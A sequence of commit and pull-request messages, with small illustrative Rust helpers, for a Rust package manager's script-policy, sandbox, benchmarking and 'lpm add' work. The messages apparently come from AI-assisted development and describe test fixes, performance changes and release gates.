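```rust
/// Whole-percent delta of `candidate_ms` relative to `baseline_ms`.
/// Integer division truncates toward zero, as bash `$(( ))` does.
/// Returns None when the baseline is 0 and no delta can be computed.
fn percent_delta(baseline_ms: i64, candidate_ms: i64) -> Option<i64> {
    if baseline_ms == 0 {
        return None;
    }
    Some((candidate_ms - baseline_ms) * 100 / baseline_ms)
}
```

The smoke-test cases listed above map to `Some(5)`, `Some(20)`, `Some(-5)`, and `None` respectively.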

v2.10 §0 item 3 documented why this reframes the original
"≤5% on no-scripts case, ≤15% on scripts case" gate — a
postinstall-free fixture produces a vacuous zero-by-construction
delta, so the honest measurement is the two-axis split on a
realistic fixture.

## Deterministic baseline snapshot (lpm-cli/tests/p46_close_policy_deny_baseline.rs)

The §18 "zero-regression guarantee for the default" contract
transposed onto a subprocess-driven byte-equal golden:

- 2-pkg synthetic fixture: trusted-pkg (legacy bare-name entry
  in package.json > lpm > trustedDependencies) + untrusted-pkg
  (no binding). Under --policy=deny, the default-branch filter
  includes the trusted one and drops the untrusted one.
- `lpm build --dry-run --policy=deny --json` on this fixture
  produces deterministic stdout because serde_json's
  preserve_order feature is on workspace-wide + the one-script
  shape avoids HashMap iteration nondeterminism.
- Golden committed at
  `tests/fixtures/p46_close_policy_deny_baseline.stdout` (13
  lines). Any drift — intentional schema evolution or
  accidental regression — forces the developer to touch this
  file and decide. Re-capture with `UPDATE_GOLDEN=1`.
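
A byte-equal golden check with an `UPDATE_GOLDEN=1` escape hatch might look like the sketch below. The helper name `check_golden` and its error text are hypothetical; the test file's actual assertion code is not shown in this commit message.

```rust
use std::{env, fs, path::Path};

/// Hypothetical golden-file assertion. Returns Ok(()) when `actual` matches
/// the golden byte-for-byte, or after re-capturing under UPDATE_GOLDEN=1.
fn check_golden(golden: &Path, actual: &str) -> Result<(), String> {
    if env::var("UPDATE_GOLDEN").as_deref() == Ok("1") {
        // Intentional schema change: overwrite the golden and accept.
        fs::write(golden, actual).map_err(|e| e.to_string())?;
        return Ok(());
    }
    let expected = fs::read_to_string(golden).map_err(|e| e.to_string())?;
    if expected == actual {
        Ok(())
    } else {
        Err(format!(
            "stdout drifted from {}; re-run with UPDATE_GOLDEN=1 if intentional",
            golden.display()
        ))
    }
}
```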

Why `lpm build --dry-run` and not `lpm install` directly: real
install against a synthetic fixture needs network or wiremock,
both out of 46.0 close-out scope (v2.9 residual gap). The
dry-run JSON output is a direct function of the post-install
persisted state, and under deny its shape is the pre-Phase-46
contract verbatim — sufficient for the zero-regression
guarantee. The test module's doc comment spells this out for
future readers.

Two tests:
- `p46_close_chunk5_policy_deny_dry_run_json_matches_golden` —
  byte-equal assertion. Manually verified by mutating the
  golden ("echo hi" → "echo drift") pre-commit: test failed
  with a clear diff pointing at the drifted line + the
  UPDATE_GOLDEN recovery command. Then restored.
- `p46_close_chunk5_policy_deny_dry_run_json_stdout_is_clean_json` —
  stream-separation sanity: stdout parseable, single package,
  trusted flag present. Pairs with the golden to catch stream
  bleed.

## Scope decisions

- Golden captures stdout only. Stderr contains ANSI + cliclack
  formatting that varies across terminal widths and versions;
  byte-equal on stderr would flake.
- Fixture uses `lpm build`, not `lpm install`. Documented
  rationale in the test module's doc comment (network vs
  wiremock scope).
- Bench is manual-trigger only (CI's `bench: workflow_dispatch`
  job). Not gating PR merges; purely a measurement tool.

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- bash -n bench/run.sh (clean)
- p46_close_policy_deny_baseline: 2/2
- p46_close_dry_run_reference: 8/8 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- Bench dispatch smoke: `./bench/run.sh cold-install-triage`
  appears in the "Available:" list and routes correctly.

## Non-goals

- Running the full bench for real in this commit. Real
  cold-install takes network + ~60-90s for 2 axes × 3 runs ×
  2 arms. The bench job runs on workflow_dispatch only; this
  commit ships the harness, not the measurement. When the
  release manager cuts 46.0 they'll run the bench manually
  to confirm the ≤5% / ≤15% gates hold on the reference
  machine and record the baseline in `bench/baselines/`.
- Snapshot on `lpm install` directly. Requires wiremock or
  real network — explicitly deferred per v2.9 residual gap.
- Multi-package script-hash drift regression tests. Covered
  by P6/P7 reference fixtures at a different granularity.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…erhead

Reviewer flagged during Chunk 5 signoff that the original wording
over-claimed. Axis 2 was labeled "execution-path overhead" for P5
sandbox spawn + P6 tier auto-execution, but on the current 51-pkg
bench fixture no packages have `preinstall` / `install` /
`postinstall` scripts — `EXECUTED_INSTALL_PHASES` at
crates/lpm-security/src/lib.rs:70 is exactly those three phases,
and the pure-JS fixture (zod, dayjs, lodash, etc.) uses only
`prepare` / `prepublishOnly` which are not in LPM's executed set.

So the autoBuild=on arm walks install → should_auto_build →
build::run → `evaluate_trust` per package → empty scriptable
set → early return. That's a measurable control-path walk, but
the sandbox never spawns and P6 auto-execution never fires. The
original "≤15% execution-path overhead" target was unsound as
stated on this fixture.
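
Why the scriptable set comes out empty on this fixture, as a minimal sketch. The constant mirrors the three phases named above; the `executed_scripts` helper is a hypothetical illustration, not the `evaluate_trust` implementation.

```rust
/// The three phases the audit names as LPM's executed set.
const EXECUTED_INSTALL_PHASES: [&str; 3] = ["preinstall", "install", "postinstall"];

/// Hypothetical filter: which of a package's script names would run at
/// install time. Everything outside the executed set is ignored.
fn executed_scripts<'a>(script_names: &[&'a str]) -> Vec<&'a str> {
    script_names
        .iter()
        .copied()
        .filter(|name| EXECUTED_INSTALL_PHASES.contains(name))
        .collect()
}
```

A package that declares only `prepare` / `prepublishOnly` produces an empty list, so the control path returns before any sandbox spawn.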

Picking Option 2 from the reviewer's two natural next steps
(relabel + defer true-execution bench, rather than curate a
script-bearing fixture now). Fixture curation is a separate
workstream: pinning a green-classified preinstall/install/
postinstall package whose own script duration doesn't dominate
the sandbox spawn cost, keeping it reproducible across time,
deciding which package class is representative, etc. — genuine
design work that doesn't fit a close-out chunk scope.

## Bench changes

- Axis 2 relabeled: "auto-build CONTROL-PATH overhead (autoBuild
  on)" — not "execution-path overhead."
- Axis 2 target: ≤5% (same as Axis 1), matching what a
  control-path walk realistically costs; the ≤15% was premised
  on sandbox spawn ~10ms/script overhead that doesn't apply here.
- Header comment gains a ⚠ block pointing at
  EXECUTED_INSTALL_PHASES, naming the missing script classes in
  the fixture, and stating the deferral.
- Per-run output line gains a `note:` follow-up clarifying
  "control-path only (no scripts in fixture); execution-path
  bench deferred."

## Plan-doc follow-up

§0 v2.11 on `phase-46-p4-server-side` of `a-package-manager`
documents the audit + narrows §12.7's Axis 2 claim to match.
Landing separately; both commits together complete the
corrected Chunk 5.

## Gates (no code change behind the relabel)

- bash -n bench/run.sh (clean)
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- All Phase 46 regression suites: 25/25 (no semantic change)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The bench harness hardcoded `$BENCH_DIR/.work` (inside the repo),
which lives under a VS-Code-watched tree. Every `cold-install-clean`
iteration writes ~25 MB / thousands of files into `node_modules/`,
triggering FSEvents → VS Code's file-watcher → `@vscode/ripgrep`
scans with `--no-ignore --follow` (which bypasses the `.gitignore`
exclusion of `bench/.work`). The rg workers spawn faster than they
reap, accumulate, and eventually saturate the macOS `-u`
(processes) ulimit (~2666 on Apple Silicon). At saturation, new
forks — DNS helpers, tokio worker threads, anything — stall with
`resource temporarily unavailable`, and the whole machine looks
frozen while benches run. This was diagnosed during the 46.0
tag-cut A/B cross-binary validation on 2026-04-23.

Two small env knobs pull the harness out of the watched tree:

- `BENCH_WORK_DIR` — redirects the per-iter scratch path; default
  `$BENCH_DIR/.work` preserved for CI compat.
- `BENCH_PROJECT_DIR` — redirects the fixture `package.json`
  source; default `$BENCH_DIR/project` preserved.

Example: the 46.0 A/B across a larger fixture runs with
  BENCH_WORK_DIR=/tmp/lpm-bench BENCH_PROJECT_DIR=/tmp/lpm-large-fixture \
    ./bench/run.sh cold-install-clean

No binary / logic change — pure harness path ergonomics. Preserves
all existing bench invocations bit-for-bit.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The helper `build_blocked_set_metadata` in install.rs previously
walked `for p in packages` and `.await`ed `get_package_metadata`
(resolver TTL cache lookup) + `fetch_provenance_snapshot`
(attestation fetch, cache-first) **serially per package**. Even
with both caches warm, that's two async boundary crossings per
package, roughly 3 ms of overhead per package in total, which stacks
linearly with the resolved dep count.

Measured on a 277-package fixture during the 46.0 tag-cut A/B
cross-binary validation on 2026-04-23 (main vs phase-46 under
`--policy=deny`, same fixture, order-alternated to cancel CF edge
warming):

- **Pre-fix:** +32 % median wall-clock regression (+770 ms).
- **Post-fix:** +6–8 % median wall-clock (+170–200 ms), within the
  ±10 % noise floor the 2026-04-10 baseline doc calls out for this
  class of measurement.

Net: ~570 ms saved on a 277-pkg fixture. The residual ~200 ms
lives in the post-stage `capture_blocked_set_after_install_with_metadata`
pass (per-package `compute_script_hash` + `read_install_phase_bodies`
on the store tree + trust-snapshot write) — legitimate Phase 46
security work that wasn't present in main; leaving that for a
follow-up perf pass if it ever surfaces as a user complaint.

Shape of the fix: collect the per-package async block into a
`Vec<impl Future<Output = Option<(...)>>>` and run them through
`futures::future::join_all(...).await`, then fold into `out`
sequentially. Order is preserved (join_all is positional), so
behaviour is byte-identical to the serial version — this is a
pure concurrency win, no logic or output change. `out` is keyed
by `(name, version)` so the final map is the same.
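
The fan-out-then-fold shape can be illustrated without an async runtime. Note the swap: this sketch uses `std::thread::scope` as a std-only stand-in for `futures::future::join_all`, and `lookup` / `build_metadata` are hypothetical names with a dummy payload. What carries over is the structure: results come back in input order, then get folded sequentially into a map keyed by `(name, version)`.

```rust
use std::collections::BTreeMap;
use std::thread;

/// Stand-in for the per-package lookup (metadata + provenance in the fix).
/// Returns None when the lookup yields nothing, like the `Option<(...)>` shape.
fn lookup(name: &str, version: &str) -> Option<((String, String), usize)> {
    if name.is_empty() {
        return None;
    }
    Some(((name.to_string(), version.to_string()), name.len()))
}

fn build_metadata(packages: &[(&str, &str)]) -> BTreeMap<(String, String), usize> {
    // Fan out: one scoped thread per package; handles stay in input order,
    // so joining them in sequence yields positional results.
    let results: Vec<Option<((String, String), usize)>> = thread::scope(|s| {
        let handles: Vec<_> = packages
            .iter()
            .map(|&(name, version)| s.spawn(move || lookup(name, version)))
            .collect();
        handles.into_iter().map(|h| h.join().unwrap()).collect()
    });
    // Fold sequentially, in the same order the serial loop would have used.
    let mut out = BTreeMap::new();
    for (key, value) in results.into_iter().flatten() {
        out.insert(key, value);
    }
    out
}
```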

Scope: touches `build_blocked_set_metadata` only (call site of the
serial loop). Related per-package patterns elsewhere in install.rs
that still use serial awaits:

- L1674 — minimum-release-age gate (`block_in_place + block_on`
  per package). Only fires on `!allow_new && !used_lockfile`, so
  users either hit the cooldown warning once and re-run with
  `--allow-new`, or bypass it entirely via project config.
  Not the common path.
- L1803 — provenance-drift gate. Gated on
  `has_rich_approvals`; while that is false the gate short-circuits,
  which is the case for every project that hasn't yet written any
  rich-form `trustedDependencies` entries (i.e. everyone today).

Both would benefit from the same fanout treatment but neither
triggers for the common `lpm install` invocation the bench
measures, so leaving them for a follow-up rather than growing the
46.0 close-out.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Captures the 2026-04-23 tag-cut bench data alongside the existing
2026-04-10 Phase 32 baseline:

- §12.7 cold-install-triage axes 1/2 (2026-04-22 23:45 reading):
  triage vs deny both inside ≤5% target per §12.7 v2.11.
- §13.1 A/B cross-binary (main vs phase-46 under --policy=deny):
  10-iter order-alternated median = **+7.8%**, within the 10%
  noise floor called out in the 2026-04-10 baseline.
- Per-stage JSON breakdown — localizes the residual delta to the
  post-stage capture_blocked_set_after_install_with_metadata pass
  (legitimate Phase 46 security work, not present in main).

Also documents the two other per-package serial-await hotspots
(L1674 minimum-release-age, L1803 provenance-drift) as backlog
items — neither triggers on the common `lpm install --allow-new`
invocation benchmarked here.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Phase 46.0 — tiered script-policy gate (runner vision).

## Highlights

Phase 46.0 ships the four-layer tiered gate defined in
`DOCS/new-features/37-rust-client-RUNNER-VISION-phase46.md`:

- **P1** — schema extensions (`script-policy`,
  `trustedDependencies` rich form with integrity + script_hash +
  provenance binding), `ScriptPolicyConfig` loader,
  `--policy=deny|allow|triage` flag, `--yolo` / `--triage`
  shorthands, trust-snapshot persistence + diff.
- **P2** — static-gate classifier. Regex-based tokenization with
  green allowlist, red denylist, amber compound-script fallback.
  ≥500-entry fixture corpus locked; ≥60% green rate on
  non-adversarial entries; zero false-positive reds.
- **P3** — cooldown (`--min-release-age` + global config key,
  `minimumReleaseAge` in `package.json`). Wraps the existing
  `--allow-new` override with a narrower numeric override path.
- **P4** — provenance-drift gate. Fetches Sigstore attestation
  identities from registry.npmjs.org, compares against approved
  snapshot, blocks on "provenance dropped" or "identity changed"
  (publisher rotation). `--ignore-provenance-drift[-all]`
  overrides for per-package / per-install waivers.
- **P5** — filesystem-scoped sandbox (macOS Seatbelt backend).
  Approved-script execution inside per-run fileset scope; §12.5
  escape test blocked; green-corpora compat green.
- **P6** — tier-aware auto-build (hard-gated on P5). `build::run`
  auto-approves greens under `triage`; `all_scripted_packages_trusted`
  is tier-aware; non-TTY autoBuild + triage snapshot test green.
- **P7** — version-diff UI. Behavioral-tag delta render,
  script-hash drift card on `approve-builds --list`, JSON
  enrichment (SCHEMA_VERSION 2→3 + per-entry `version_diff`).
- **P9** — close-out. `cold-install-triage` bench green
  (Axis 1 −15%, Axis 2 +3% vs deny, both ≤5% target). Next.js
  16.2.4 red-count = 0 validation on 2026-04-22. Cross-binary
  A/B on 277-pkg fixture: +7.8% median wall-clock (within the
  ±10% noise floor).

P8 (LLM triage harness) is **deferred to Phase 46.1**. Its hard
preconditions, P5 + P6, are shipped; the LLM detection + constrained
verdict schema lands in the follow-up phase.

## Release tag-cut fixes (this session)

- `ed001fa` — bench harness honors `BENCH_WORK_DIR` +
  `BENCH_PROJECT_DIR` env overrides so running `cold-install-clean`
  doesn't trigger VS Code's `--no-ignore` rg search storm on the
  workspace `bench/.work` tree.
- `f19d23e` — `install.rs > build_blocked_set_metadata` fanned
  out through `futures::future::join_all`. Serial per-package
  `.await`s on metadata + provenance lookups were adding ~770ms
  to deny-mode wall-clock on a 277-package tree; fanout drops
  that to ~200ms (noise floor). Tree output is byte-identical to
  the serial version.
- `4607f4f` — `bench/baselines/2026-04-23-46.0-macos-arm64.md`
  records the tag-cut readings and documents two other
  per-package serial-await hotspots (L1674 minimum-release-age,
  L1803 provenance-drift) as backlog items.

## Release artifacts

- Workspace `Cargo.toml` (0.22.0 → 0.23.0) + 5
  `npm/cli-*/package.json` (same bump).
- `Cargo.lock` auto-synced via `cargo check --workspace`
  (gitignored; CI re-syncs on its own).
- Local CI gate green:
  - `cargo clippy --workspace --all-targets -- -D warnings`
  - `cargo fmt --check`
  - fancy-regex guard
  - `cargo build --workspace`
  - `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 4217/4217
  - `cargo test -p lpm-auth` × 3 under default parallelism — 47/47 each, deterministic

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The test module in `lpm-cert/src/trust.rs` contains a single test
that is `#[cfg(target_os = "macos")]`. On Linux CI, the test itself
is filtered out at compile time, leaving the enclosing `mod tests`
with an empty body and a now-unused `use super::*`, which fails
`cargo clippy -- -D warnings` per the `unused-imports` rule.

Local `cargo clippy --workspace --all-targets -- -D warnings` on
macOS didn't catch this because the macOS test IS compiled and
DOES use the `login_keychain_path` symbol via `super::*`. Only
the Linux runner surfaces the drift.

Per the Rust CLI cross-platform hygiene rules in
`a-package-manager/CLAUDE.md > Rust CLI Code Rules`:

> Move platform imports into the function body — If a `use`
> import is only needed inside a `#[cfg]` block, put the `use`
> inside that block, not at the top of the file.

Simpler here: qualify `super::login_keychain_path` at the one
call site and drop the `use` entirely. The module has no other
imports.
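
The shape of the fix, as a sketch. The body and signature of `login_keychain_path` here are hypothetical stand-ins (the real function lives in `lpm-cert/src/trust.rs` and is not shown); only the module layout is the point.

```rust
/// Hypothetical stand-in for the real `login_keychain_path`.
#[allow(dead_code)]
fn login_keychain_path(home: &str) -> String {
    format!("{home}/Library/Keychains/login.keychain-db")
}

#[cfg(test)]
mod tests {
    // No `use super::*;` here: on non-macOS targets the only test is
    // compiled out, and a module-level glob import would be flagged as
    // unused under `-D warnings`.
    #[cfg(target_os = "macos")]
    #[test]
    fn keychain_path_is_under_home() {
        // Qualify the one call site instead of importing.
        let path = super::login_keychain_path("/Users/dev");
        assert!(path.starts_with("/Users/dev/"));
    }
}
```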

No functional change. Pre-existing hygiene bug surfaced by the
phase-46 PR run on #7 (tagging v0.23.0 fired the Release workflow
from the tag and succeeded; the PR CI event is what runs the Linux
lint job).

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…y-test fix)

The §12.5 escape-corpus read tests and the two in-module write/read
deny tests in `linux.rs` placed their "forbidden" probe files
under `tempfile::tempdir()`. On macOS this resolved to
`/var/folders/.../T/.tmpXXX/` — outside every sandbox rule, so
Seatbelt correctly denied access and the tests asserted
that denial.

On Linux, `tempfile::tempdir()` defaults to `/tmp/.tmpXXX/`, and
`/tmp` is in the Landlock RW allow list by design (see
compat_greens `tmp_scratch_write_shape_succeeds` — many real-world
postinstalls hardcode `/tmp/...` paths for intermediate artifacts
and the sandbox must not break them). Every probe landed INSIDE
the allow list, Landlock correctly permitted it, and the tests
then asserted denial → FAIL.

Five failing tests on #7's Linux CI, all of this shape:

- lpm-sandbox::linux::tests::denies_write_outside_allow_list_under_enforce
- lpm-sandbox::linux::tests::enforces_deny_on_read_outside_allow_list
- lpm-sandbox::escape_corpus::block_read_of_file_outside_allow_list
- lpm-sandbox::escape_corpus::block_read_of_ssh_credential_shape_path
- lpm-sandbox::escape_corpus::block_read_of_aws_credentials_shape_path

Root cause: the *tests* picked a probe location that on Linux
happens to overlap the sandbox's designed-in /tmp RW permission.
The sandbox rule is correct (backed by the green-corpus
`/tmp`-write test); the test setup was testing the wrong thing.

Fix: relocate every forbidden probe onto `/var/tmp/<unique>` — a
standard Unix scratch dir that's user-writable on both macOS and
Linux and is NOT referenced by any rule in describe_rules or the
Seatbelt profile. Probes clean up after themselves
(`remove_dir_all` at test end); the `!target.exists()` assertion
still catches genuine sandbox escapes.
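
A probe-directory helper in the spirit of the fix, as a minimal sketch. The name `make_probe_dir`, the `lpm-probe-` prefix, and the uniqueness scheme (pid + nanosecond timestamp) are assumptions; the tests' actual helper is not shown here. The base is a parameter so the caller decides the location (`/var/tmp` in the fix).

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};
use std::process;
use std::time::{SystemTime, UNIX_EPOCH};

/// Hypothetical helper: create a uniquely named probe directory under
/// `base`, a location that no sandbox allow rule is meant to cover.
fn make_probe_dir(base: &Path, label: &str) -> io::Result<PathBuf> {
    let nanos = SystemTime::now()
        .duration_since(UNIX_EPOCH)
        .map(|d| d.as_nanos())
        .unwrap_or(0);
    let dir = base.join(format!("lpm-probe-{label}-{}-{nanos}", process::id()));
    // `create_dir` errors if the path already exists, so a name collision
    // surfaces as a failure instead of silently reusing a directory.
    fs::create_dir(&dir)?;
    Ok(dir)
}
```

Callers are expected to `remove_dir_all` the returned path at test end, matching the cleanup described above.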

Also uncovered and preserved: the in-module unit test
`tmpdir_distinct_from_slash_tmp_gets_its_own_rule` was
accidentally deleted in an earlier attempt at this fix — restored
with the original semantics (additive `(spec.tmpdir, RW)` +
blanket `/tmp` rule, both present). The additive behavior is
intentional per Phase 46's §9.3 design and required by the
compat-greens `/tmp` test.

Ran locally on macOS arm64:
- `cargo clippy --workspace --all-targets -- -D warnings` — clean
- `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 4217/4217 pass, 7 skipped (mode-specific)
- `cargo test -p lpm-sandbox` — 72 lib + 7 escape + 7 compat_greens
  = 86 tests, all green

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two small CI fixes landing atop the 2026-04-23 sandbox probe-path
correction (commit 10e75ac):

**1. `lpm-task::filter::eval::tests::perf_eval_glob_200_members_under_500us_per_call`**

Per-op budget test flaked on GitHub Actions Linux runner. Root
cause: the `time_per_op` helper returned `total_elapsed_ns /
iters` after a SINGLE round of `iters` iterations. A single
500 ms scheduler stall during the 500-iter loop amortized into
+1 ms per-op — 2× the 500 µs debug budget.

This wasn't a code regression; it was an unreliable measurement
on shared hardware. Changed `time_per_op` to best-of-5 rounds:
each round runs `iters_per_round` iterations independently, the
minimum round's ns/op is returned. Rationale: a ns/op budget
is asking "can this code hit this latency when the scheduler
cooperates?" — a genuine regression in LPM's own code shifts
ALL rounds (so the minimum moves too), whereas a single stall
only hurts one round (min unaffected). Best-of-N gives us a
regression detector that survives CI without masking actual slowdowns.
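
The best-of-N idea, sketched under assumptions: the name `time_per_op_best_of` and its signature are hypothetical, and the real `time_per_op` helper may differ in shape.

```rust
use std::time::Instant;

/// Hypothetical best-of-N timer: run `rounds` independent rounds of
/// `iters_per_round` calls and return the fastest round's ns/op.
fn time_per_op_best_of<F: FnMut()>(rounds: u32, iters_per_round: u32, mut op: F) -> f64 {
    assert!(rounds > 0 && iters_per_round > 0);
    let mut best = f64::INFINITY;
    for _ in 0..rounds {
        let start = Instant::now();
        for _ in 0..iters_per_round {
            op();
        }
        let ns_per_op = start.elapsed().as_nanos() as f64 / f64::from(iters_per_round);
        // A scheduler stall inflates one round; taking the minimum ignores it.
        best = best.min(ns_per_op);
    }
    best
}
```

With `rounds = 5`, a single stalled round cannot push the returned value over budget, while a slowdown in the code under test raises every round and therefore the minimum too.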

All four perf tests (parse, exact-name, glob, closure-with-deps)
now share the best-of-5 helper. Error messages updated to say
"best-of-5" so the signal is discoverable.

**2. Rustfmt 1.94.0 reflow**

`cargo fmt` on pinned 1.94.0 (the CI toolchain) preferred
`.join(format!(...))` chains wrapped differently from the local
`rustfmt` default — harmless whitespace-only diff on
`lpm-sandbox/src/linux.rs` and `lpm-sandbox/tests/escape_corpus.rs`.
Reformatted to match CI.

Ran locally:
- `rustup run 1.94.0 cargo fmt --check` — clean
- `cargo clippy --workspace --all-targets -- -D warnings` — clean
- `cargo test -p lpm-task filter::eval::tests` — 54 pass

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin merged commit a9aa1a1 into main on Apr 23, 2026
3 checks passed
tolgaergin added a commit that referenced this pull request Apr 29, 2026
* phase-60 D2: promote download_tarball_routed helpers to RegistryClient

Behavior-preserving refactor extracting the two private routed-tarball
helpers from install.rs (download_tarball_routed,
download_tarball_streaming_routed) onto RegistryClient as public
methods. Both `lpm install` and the upcoming Phase 60 `lpm add` source-
delivery flow consume the same Custom-route auth-attachment logic.

- crates/lpm-registry/src/client.rs: add public methods
- crates/lpm-cli/src/commands/install.rs: switch all 5 call sites to
  the new methods; delete the private helpers; remove the now-unused
  DownloadedTarball import

All 602 install + npmrc tests still pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.0.e: PackageMetadata::resolve_version_spec helper

Add a three-tier version-spec resolver on PackageMetadata covering
dist-tag → exact-version → semver-range, mirroring the canonical
pattern at install_global.rs:368-405 verbatim.

Pre-Phase-60, `lpm add react@beta`, `next@canary`, `lodash@^4` all
failed because PackageMetadata::version() is a pure HashMap lookup —
none of those literal strings exist as concrete versions. The new
helper closes the gap.

Per D3 (preplan): both parse-failure and no-satisfying-version
return LpmError::Script (matching install_global verbatim) so the
Phase 60.1 migration of the four duplicate sites (install_global,
install, update_global, global) is a true behavior-preserving
refactor.

9 unit tests cover dist-tag (latest/beta/canary), exact match,
caret/tilde range, no-satisfying error, parse-fail error, and
empty-versions error.
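
A rough sketch of the three-tier order described above (dist-tag, then exact version, then range). It is not the real helper: `Metadata` is a hypothetical trimmed-down type, errors are plain `String`s rather than `LpmError::Script`, and the range tier handles only caret ranges with a non-zero major instead of full semver.

```rust
use std::collections::HashMap;

/// Hypothetical, trimmed-down stand-in for the package metadata type.
pub struct Metadata {
    pub dist_tags: HashMap<String, String>,
    pub versions: Vec<String>,
}

/// Parses a plain "major.minor.patch" string; prerelease versions return None.
fn parse_triple(v: &str) -> Option<(u64, u64, u64)> {
    let mut parts = v.split('.').map(|p| p.parse::<u64>().ok());
    let triple = (parts.next()??, parts.next()??, parts.next()??);
    if parts.next().is_some() {
        return None;
    }
    Some(triple)
}

/// Parses "^M", "^M.m" or "^M.m.p" into a lower bound (sketch: major must be > 0).
fn parse_caret(spec: &str) -> Option<(u64, u64, u64)> {
    let rest = spec.strip_prefix('^')?;
    let mut nums = rest.split('.').map(|p| p.parse::<u64>().ok());
    let major = nums.next()??;
    let minor = match nums.next() { Some(n) => n?, None => 0 };
    let patch = match nums.next() { Some(n) => n?, None => 0 };
    if nums.next().is_some() || major == 0 {
        return None;
    }
    Some((major, minor, patch))
}

impl Metadata {
    pub fn resolve_version_spec(&self, spec: &str) -> Result<String, String> {
        // Tier 1: dist-tag lookup ("latest", "beta", "canary", ...).
        if let Some(v) = self.dist_tags.get(spec) {
            return Ok(v.clone());
        }
        // Tier 2: exact concrete version.
        if self.versions.iter().any(|v| v == spec) {
            return Ok(spec.to_string());
        }
        // Tier 3: range; pick the highest version with the same major at or above the bound.
        let lower = parse_caret(spec).ok_or_else(|| format!("cannot parse version spec `{spec}`"))?;
        self.versions
            .iter()
            .filter_map(|v| parse_triple(v).map(|t| (t, v)))
            .filter(|(t, _)| t.0 == lower.0 && *t >= lower)
            .max_by_key(|(t, _)| *t)
            .map(|(_, v)| v.clone())
            .ok_or_else(|| format!("no version satisfies `{spec}`"))
    }
}
```

The ordering matters: a spec like `beta` never reaches the range parser, which is why a pure map lookup on concrete versions could not resolve it.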

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.0+60.1+60.1.5+60.2: lpm add source delivery from any registry

Decouple `lpm add` from LPM-only package identity, mirror install's
full .npmrc setup, switch to file-spool tarball download, add
destination-side path containment, gate dep auto-install on
lpm.config.json presence, and surface external imports for the simple
path. End-to-end flow now works for any package on any registry the
rust client can reach (lpm.dev worker, npmjs.org direct, .npmrc-
declared private registries).

60.0.a + 60.0.b — Identity refactor + drop dotted-name auto-prepend
- New AddTarget enum: Lpm(PackageName) | Npm { spec: String }.
- New resolve_add_target replaces parse_package_ref. No rewriting
  outside the @lpm.dev/ scope — `lodash.merge`, `tolga.foo`, etc.
  resolve to AddTarget::Npm verbatim. Fixes a long-standing
  correctness bug: pre-Phase-60 dotted bare names were silently
  rewritten to @lpm.dev/<name> which doesn't exist on lpm.dev.
- All output / log / JSON sites render via target.display() /
  target.json_name() — `name.scoped()` no longer used unconditionally.
- Skills branch type-encoded via `let AddTarget::Lpm(pkg) = &target`
  pattern, with a why-comment (60.2) explaining the scope gate
  (lpm.dev runs LLM scans on shipped skill content; arbitrary npm
  packages are not scanned).
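
The classification rule above can be sketched as follows. This is an illustration only: the real `AddTarget::Lpm` wraps a `PackageName`, for which a plain `String` stands in here, and the body of `resolve_add_target` is an assumption based on the "no rewriting outside the @lpm.dev/ scope" rule.

```rust
/// Sketch of the two-variant identity type; `String` stands in for `PackageName`.
#[derive(Debug, PartialEq)]
pub enum AddTarget {
    Lpm(String),
    Npm { spec: String },
}

/// Only the `@lpm.dev/` scope selects the LPM branch; everything else is
/// passed through verbatim, including dotted bare names.
pub fn resolve_add_target(input: &str) -> AddTarget {
    if input.starts_with("@lpm.dev/") {
        AddTarget::Lpm(input.to_string())
    } else {
        AddTarget::Npm { spec: input.to_string() }
    }
}

impl AddTarget {
    /// Name as the user typed it, for output and logs.
    pub fn display(&self) -> &str {
        match self {
            AddTarget::Lpm(name) => name,
            AddTarget::Npm { spec } => spec,
        }
    }
}
```

Under this sketch `lodash.merge` stays `AddTarget::Npm { spec: "lodash.merge" }` and is never rewritten into the `@lpm.dev/` scope.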

60.0.c — Mirror install's full .npmrc setup
- Build RouteTable::from_env_and_filesystem before any network call.
- Surface npmrc_warnings (non-JSON) and the strict-ssl=false security
  warning (escapes --json). Clone the client with with_tls_overrides
  so cafile= / strict-ssl=false take effect on metadata + tarball
  fetches. Mirrors install.rs:3295-3445.

60.0.d — Routed metadata + file-spool tarball
- Metadata: AddTarget::Lpm uses get_package_metadata; AddTarget::Npm
  uses get_npm_metadata_routed.
- Tarball: client.download_tarball_routed (D2 promoted helper) +
  lpm_extractor::extract_tarball_from_file. Bounded memory via
  MAX_COMPRESSED_TARBALL_SIZE (500 MB) for free; lpm add typescript
  (~22 MB) and worst-case @scope/giant-fixture no longer load the
  whole tarball into RAM.

60.0.f — Destination-side path containment (D6)
- New resolve_safe_dest helper canonicalizes target_dir once and
  validates every write destination: refuses to follow existing
  symlinks, rejects writes whose canonical parent escapes the target
  root. Wired into the Step 8 file-copy loop. Closes the threat-model
  gap that opened up when add expanded from "trusted lpm.dev
  publishers" to "any npm publisher."

60.1 — Dep gate + bare-imports notice (D4)
- Tighten dep gate: `if !no_install_deps && lpm_config.is_some()`.
